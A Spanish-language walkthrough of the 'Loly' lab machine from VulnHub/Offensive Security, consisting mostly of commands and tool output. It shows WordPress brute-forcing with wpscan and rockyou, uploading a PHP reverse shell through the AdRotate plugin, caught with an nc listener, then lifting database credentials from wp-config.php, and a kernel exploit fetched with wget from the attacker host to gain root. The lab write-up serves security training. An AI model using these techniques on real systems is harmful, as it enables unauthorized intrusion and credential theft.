Maquina Loly de Offensive Security (No necesario VIP)
Published on 10 May 2022
Loly ~ Offensive Security ~ VulnHub
Realizamos el Primer escaneo con Nmap
$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 192.168.224.121 "
Procedemos con el siguiente escaneo de Nmap
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Procedemos a enumerar la web
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /wordpress/: Blog
|_ /wordpress/wp-login.php: Wordpress login page.
Procedemos a usar la herramienta WPSCAN
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.14
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+][0m URL: http://192.168.224.121/wordpress/ [192.168.224.121]
[+][0m Started: Tue May 10 20:43:29 2022
Interesting Finding(s):
[+][0m Headers
| Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+][0m XML-RPC seems to be enabled: http://192.168.224.121/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+][0m WordPress readme found: http://192.168.224.121/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+][0m The external WP-Cron seems to be enabled: http://192.168.224.121/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+][0m WordPress version 5.5 identified (Insecure, released on 2020-08-11).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.224.121/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.224.121/wordpress/, Match: 'WordPress 5.5'
[[i][0m The main theme could not be detected.
[i][0m No plugins Found.
[i][0m No themes Found.
[i][0m No Timthumbs Found.
[i][0m No Config Backups Found.
[i][0m No DB Exports Found.
[i][0m Medias(s) Identified:
[+][0m http://192.168.224.121/wordpress/?attachment_id=12
| Found By: Attachment Brute Forcing (Aggressive Detection)
[i][0m User(s) Identified:
[+][0m loly
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!][0m No WPScan API Token given, as a result vulnerability data has not been output.
[!][0m You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+][0m Finished: Tue May 10 20:43:56 2022
[+][0m Requests Done: 3369
[+][0m Cached Requests: 27
[+][0m Data Sent: 1007.486 KB
[+][0m Data Received: 641.986 KB
[+][0m Memory used: 269.203 MB
[+][0m Elapsed time: 00:00:27
Encontramos el user loly
Procedemos a hacer fuerza bruta para el user encontrado
------------- Fuerza Bruta con WPSCAN + ROCKYOU.txt --------------------
# wpscan --url http://192.168.224.121/wordpress --usernames loly --passwords /usr/share/wordlists/rockyou.txt --no-banner 2 ⨯
WARNING: Nokogiri was built against libxml version 2.9.10, but has dynamically loaded 2.9.12
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.224.121/wordpress/ [192.168.224.121]
[+] Started: Tue May 10 20:48:47 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.224.121/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://192.168.224.121/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.224.121/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.224.121/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.224.121/wordpress/, Match: 'WordPress 5.5'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <===================================================================================================================================> (137 / 137) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando
Trying loly / corazon Time: 00:00:02 < > (175 / 14344573) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: loly, Password: fernando
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue May 10 20:48:54 2022
[+] Requests Done: 316
[+] Cached Requests: 29
[+] Data Sent: 133.992 KB
[+] Data Received: 128.072 KB
[+] Memory used: 229.09 MB
[+] Elapsed time: 00:00:07
User loly Password fernando
Procedemos a loguearnos al wp-login.php
Accedemos al wordpress
Rapidamente identificamos el siguiente elemento –> ADROTATE
http://loly.lc/wordpress/wp-admin/admin.php?page=adrotate-media&status=202
Resulta que mediante ADRotate apuntando a Manage Media → Tenemos un File Upload Procedemos a subir un archivo .php pero .zip
Buscamos por # locate php-reverse-shell
/usr/share/webshells/php/php-reverse-shell.php
Nos traemos el archivo .php modificamos la ip y el puerto Procedemos a zippear el archivo:
# zip prs.zip prs.php
updating: prs.php (deflated 60%)
# ls
prs.php prs.zip
Nos ponemos a la escucha con nc -vlnp 443
Subimos el archivo Se sube correctamente Procedemos a Buscar la ruta de subida del archivo
http://loly.lc/wordpress/wp-content/banners/
Apuntamos a nuestro archivo para ganar acceso
http://loly.lc/wordpress/wp-content/banners/prs.php
Recibimos la consola por nuestra session a la escucha
# nc -vlnp 443
listening on [any] 443 ...
connect to [192.168.49.224] from (UNKNOWN) [192.168.224.121] 43470
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
12:02:22 up 1:10, 0 users, load average: 1.00, 1.01, 0.96
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (3001): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/$
www-data@ubuntu:/var$ ls
backups cache lib local lock log mail opt run spool tmp www
www-data@ubuntu:/var$ cd www
www-data@ubuntu:~$ ls
html local.txt
www-data@ubuntu:~/html/wordpress$ pwd
/var/www/html/wordpress
www-data@ubuntu:~/html/wordpress$ ls
index.php wp-blog-header.php wp-includes wp-settings.php
license.txt wp-comments-post.php wp-links-opml.php wp-signup.php
readme.html wp-config.php wp-load.php wp-trackback.php
wp-activate.php wp-content wp-login.php xmlrpc.php
wp-admin wp-cron.php wp-mail.php
Leemos el archivo wp-config.php
Encontramos la siguiente credencial –> lolyisabeautifulgirl
wordpress:lolyisabeautifulgirl → base de datos mysql
Reutilizacion de Credenciales?? loly ??
su loly: lolyisabeautifulgirl
www-data@ubuntu:~/html/wordpress$ su loly
Password:
loly@ubuntu:/var/www/html/wordpress$
Nos convertimos en el user loly con la credencial encontrada
Escalada de Privilegios ~ Kernel Exploit (Ubuntu 4.4.0.3)
Procedemos a enumerar informacion
loly@ubuntu:/var/www/html/wordpress$ uname -a
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
Buscamos con Searchsploit
searchsploit ubuntu 4.4.0.3
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Nos traemos el exploit en .c
gcc 45010.c -o shell
python3 -m http.server 80 ------- compartiendo shell
Desde la maquina victima para pasarnos el exploit
loly@ubuntu:~$ wget http://IP/shell
loly@ubuntu:~$ ls
shell
loly@ubuntu:~$ chmod +x shell
loly@ubuntu:~$ ./shell
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003489f000
[*] Leaking sock struct from ffff88007bd9e3c0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880034959780
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880034959780
[*] credentials patched, launching shell...
# whoami
root
# cd /root
# dir
proof.txt root.txt